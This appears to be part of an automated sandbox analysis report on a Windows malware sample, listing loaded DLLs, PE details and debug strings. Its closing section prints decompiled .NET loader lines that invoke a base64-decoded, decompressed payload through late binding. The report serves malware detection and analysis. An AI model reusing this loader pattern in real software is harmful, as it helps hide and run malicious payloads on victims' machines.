                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\lsass.exeSection loaded: ngcpopkeysrv.dll
                Source: C:\Windows\System32\lsass.exeSection loaded: devobj.dll
                Source: C:\Windows\System32\lsass.exeSection loaded: pcpksp.dll
                Source: C:\Windows\System32\lsass.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\lsass.exeSection loaded: tbs.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: r8k29DBraE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: r8k29DBraE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbP source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE551.tmp.dmp.8.dr
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE551.tmp.dmp.8.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb$ source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb\2 source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb'E source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.ni.pdbD source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbHt' source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdbLe: source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb@ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdbMZ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb$g source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Thelounge.Love,Thelounge.Feelings,Thelounge.SPL,Thelounge.KEY,Iloveyou.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Iloveyou.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Thelounge.Love,Thelounge.Feelings,Thelounge.SPL,Thelounge.KEY,Iloveyou.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
